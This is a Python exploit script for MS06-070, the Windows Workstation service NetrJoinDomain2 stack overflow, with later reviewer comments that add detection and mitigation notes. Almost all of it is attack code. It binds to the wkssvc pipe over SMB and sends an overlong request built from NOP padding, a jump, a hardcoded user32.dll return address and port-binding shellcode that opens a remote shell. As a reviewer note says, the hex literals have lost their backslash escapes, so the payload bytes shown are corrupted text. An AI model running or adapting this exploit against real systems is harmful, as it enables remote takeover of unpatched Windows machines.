# Title : MS Windows NetpManageIPCConnect Stack Overflow Exploit (py)
# Published : 2006-11-18
# Author : Winny Thomas
#!/usr/bin/python
# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
# Tested on windows 2000 server SP4
#
# Usage: python NetAPI-NetrJoinDomain2.py <target ip> <domainname>
# Requires a domain controller on the network (configure samba as DC)
# Requires python and impacket
#
# Winny M Thomas ;-)
from impacket.dcerpc import transport
from impacket import uuid
import sys
import socket
import struct
def DCEconnectAndExploit(target, domain):
    """Bind to the wkssvc named pipe on ``target`` and send one oversized
    NetrJoinDomain2 request (opnum 0x16) - the MS06-070 condition.

    Parameters:
        target -- host name or IP of the Windows machine (SMB, TCP 445).
        domain -- domain name placed in the request; its length is added to
                  ``baselen`` to form the length fields packed into query2.

    Returns nothing; the only effect is the DCE/RPC call.  Socket and
    DCE/RPC errors raised by impacket propagate to the caller.

    The request is assembled from three parts:
      query1 -- a 4-byte marker followed by a short counted UTF-16LE string;
      query2 -- three native-size longs (length, 0, length) and the
                NUL-widened ``domain``;
      query3 -- the overlong buffer: repeated 0x90 padding, a short jump, a
                fixed user32.dll address, the embedded shellcode, more
                padding, and a trailing block of small integers.

    Detection / mitigation notes: on the wire this is an SMB session to port
    445, a DCE/RPC bind to interface 6bffd098-a112-3610-9833-46c3f87e345a
    v1.0 over \\pipe\\wkssvc, then a request with opnum 0x16 whose string
    arguments claim 3708 + len(domain) characters.  The MS06-070 update
    addresses the vulnerability; filtering TCP 445 from untrusted networks
    and alerting on NetrJoinDomain2 calls from non-administrative hosts
    limits exposure on unpatched systems.

    NOTE(review): in this copy the hex byte-string literals appear to have
    lost their backslash escapes (compare the intact ``\\pipe\\`` in the
    binding string), so the literals below are plain ASCII text rather than
    the bytes the inline comments describe.
    """
    baselen = 3708  # base for the length fields packed into query2
    # DCE/RPC over an SMB named pipe.  The format string consumes only
    # 'host' and 'pipe'; the 'port' key in the mapping is never used by it.
    stringbinding = "ncacn_np:%(host)s[\pipe\%(pipe)s]"
    stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
    print 'Connecting to named pipe (wkssvc)'
    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.connect()
    print 'Setting up DCE transport'
    dce = trans.DCERPC_class(trans)
    # Bind to the Workstation service interface, version 1.0.
    dce.bind(uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a','1.0')))
    print 'Sending attack payload to target'
    #NetrJoinDomain2 data: Hostname
    # 4-byte marker, then three longs (7, 0, 7) - presumably an NDR counted
    # string header - followed by the UTF-16LE characters \\AUX7 and a
    # terminating NUL (7 characters in total).
    query1 = "xaaxbbxccxdd"
    query1 += "x07x00x00x00"
    query1 += "x00x00x00x00"
    query1 += "x07x00x00x00"
    query1 += "x5Cx00x5Cx00"
    query1 += "x41x00x55x00"
    query1 += "x58x00x37x00"
    query1 += "x00x00x00x00"
    #NetrJoinDomain2 data: Domain/Hostname
    # Widen ``domain`` to UTF-16LE by interleaving NUL bytes (ASCII input
    # assumed), then the same three-field header as above, but with the
    # inflated length ``baselen + len(domain)`` in the count fields.
    targetd = 'x00'.join(list(domain)) + 'x00'
    Len = baselen + len(domain)
    # 'L' with no '<'/'=' prefix packs a *native* unsigned long: 4 bytes on
    # 32-bit builds but 8 bytes on most 64-bit builds, so captures taken
    # from different hosts will show different field widths here.
    query2 = struct.pack('L', Len)
    query2 += struct.pack('L', 0)
    query2 += struct.pack('L', Len)
    query2 += targetd
    # Third string: four UTF-16 units, then 0x90 padding up to the jump and
    # fixed-address pair that the original author annotated below.
    query3 = "x5Cx00x5Cx00x76x00x90x90"
    query3 += "x90x90" * 1058
    query3 += "xEBx06" #6 byte jump from current pointer in ebx
    query3 += "x27x16xE1x77" #Address from user32.dll (0x77E11627)
    #350 byte port binding shellcode
    # Opaque embedded bytes as shipped by the original author; not analysed
    # here.  The listening port is not visible in this listing.
    query3 += "x90x90x90x90x90x90"
    query3 += "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73"
    query3 += "x13xe9x59x23xcex83xebxfcxe2xf4x15x33xc8x83"
    query3 += "x01xa0xdcx31x16x39xa8xa2xcdx7dxa8x8bxd5xd2"
    query3 += "x5fxcbx91x58xccx45xa6x41xa8x91xc9x58xc8x87"
    query3 += "x62x6dxa8xcfx07x68xe3x57x45xddxe3xbaxeex98"
    query3 += "xe9xc3xe8x9bxc8x3axd2x0dx07xe6x9cxbcxa8x91"
    query3 += "xcdx58xc8xa8x62x55x68x45xb6x45x22x25xeax75"
    query3 += "xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
    query3 += "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57"
    query3 += "xcfx9ex16x8fx45x9dx8fx31x10xfcx81x2ex50xfc"
    query3 += "xb6x0dxdcx1ex81x92xcex32xd2x09xdcx18xb6xd0"
    query3 += "xc6xa8x68xb4x2bxccxbcx33x21x31x39x31xfaxc7"
    query3 += "x1cxf4x74x31x3fx0ax70x9dxbax0ax60x9dxaax0a"
    query3 += "xdcx1ex8fx31x32x95x8fx0axaax2fx7cx31x87xd4"
    query3 += "x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6x4dxf4"
    query3 += "x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
    query3 += "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9f"
    query3 += "x5ax99x16x8fx76x31x39x3fx49xaax8fx31x40xa3"
    query3 += "x60xbcx49x9exb0x70xefx47x0ex33x67x47x0bx68"
    query3 += "xe3x3dx43xa7x61xe3x17x1bx0fx5dx64x23x1bx65"
    query3 += "x42xf2x4bxbcx17xeax35x31x9cx1dxdcx18xb2x0e"
    query3 += "x71x9fxb8x08x49xcfxb8x08x76x9fx16x89x4bx63"
    query3 += "x30x5cxedx9dx16x8fx49x31x16x6exdcx1ex62x0e"
    query3 += "xdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
    query3 += "xbaxa6xf5x31x39x59x23xce";
    query3 += "x90x90" * 2467  # trailing padding after the shellcode
    # Trailing small integers: two NULs, three zero longs, two NULs, then 1.
    # Their NetrJoinDomain2 field meanings are not annotated in the original.
    query3 += "x00x00"
    query3 += "x00x00x00x00"
    query3 += "x00x00x00x00"
    query3 += "x00x00x00x00"
    query3 += "x00x00"
    query3 += "x01x00x00x00"
    query = query1 + query2 + query3
    # Opnum 0x16 is NetrJoinDomain2 (per the exploit title); a single call
    # is all the script sends.
    dce.call(0x16, query)
if __name__ == '__main__':
    # Exactly two positional arguments are expected; a missing one raises
    # IndexError, which is turned into a usage message and exit code -1.
    try:
        target = sys.argv[1]
        domain = sys.argv[2]
    except IndexError:
        print 'Usage: %s <target ip> <domain>' % sys.argv[0]
        sys.exit(-1)
    # No validation of the arguments is performed before the connection.
    DCEconnectAndExploit(target, domain)